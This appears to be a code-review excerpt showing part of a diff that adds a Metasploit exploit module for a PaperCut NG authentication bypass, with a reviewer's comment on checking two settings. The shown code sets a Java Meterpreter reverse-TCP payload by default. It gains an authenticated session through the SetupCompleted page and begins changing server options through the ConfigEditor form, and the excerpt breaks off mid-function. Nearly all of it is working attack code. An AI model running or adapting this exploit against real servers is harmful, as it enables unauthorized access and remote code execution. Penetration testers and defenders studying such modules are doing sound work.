modules/exploits/multi/http/papercut_ng_auth_bypass.rb

```diff
@@ -0,0 +1,282 @@
+          'PAYLOAD' => 'java/meterpreter/reverse_tcp',
+          'RPORT' => '9191',
+          'SSL' => 'false',
+          'TARGETURI' => '/app',
+          'PAYLOAD_CLASS' => 'metasploit.Payload',
+          'JAR_FILE' => '',
+          'HTTPDELAY' => 10
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to the papercut application']),
+        OptString.new('PAYLOAD_CLASS', [false, 'Class containing main method to load']),
+        OptString.new('JAR_FILE', [true, 'Local path to jar file to serve, e.g. msfvenom output jar file']),
+        OptInt.new('HTTPDELAY', [false, 'Path to the papercut application']),
+        OptBool.new('NEVER_SET', [false, 'Never set server options to avoid unnecessary log events.'])
+      ], self.class
+    )
+  end
+
+  def bypass_auth
+    # Hit the SetupCompleted Page & establish an authenticated session.
+    # Return success/fail or vuln/not vuln based on response values
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'service' => 'page/SetupCompleted'
+        }
+      }
+    )
+    return Exploit::CheckCode::Safe unless res && res.code == 200
+
+    return Exploit::CheckCode::Vulnerable
+  end
+
+  def set_server_option(name, value)
+    # set name:value pair(s)
+    # 1) do a quickfind (setting the tapestry state)
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'headers' => {
+          'Origin' => @origin
+        },
+        'vars_post' => {
+          'service' => 'direct/1/ConfigEditor/quickFindForm',
+          'sp' => 'S0',
+          'Form0' => '$TextField,doQuickFind,clear',
+          '$TextField' => name,
+          'doQuickFind' => 'Go'
+        }
+      }
+    )
+    # TODO: 2) if no property found, add it?
+    # 3) else, if necessary, do an update
+    if not res || res.code != 200
+      print_error("Response error when attempting to find server option '#{name}'")
+      return Exploit::Failed
+    end
+
+    html = res.get_html_document
+    td = html.xpath("//td[@class='propertyNameColumnValue']")
+    if not td || td.count != 1 || td.text != name
+      print_error("xpath error: could not find single <td> containing server option '#{name}'") unless td && td.count == 1 && td.text == name
+      return Exploit::Failed
+    end
+
+    value_input = html.xpath("//input[@name='$TextField$0']")
+    current_value = value_input[0]['value']
+    if current_value == value
+      vprint_good("Server option '#{name}' already set to '#{value}')")
+      return
+    end
+
+    if datastore['NEVER_SET']
```

Comment:
If you want to keep this, you should check what the values of the 2 settings are, and if either isn't optimal, hit a `fail_with`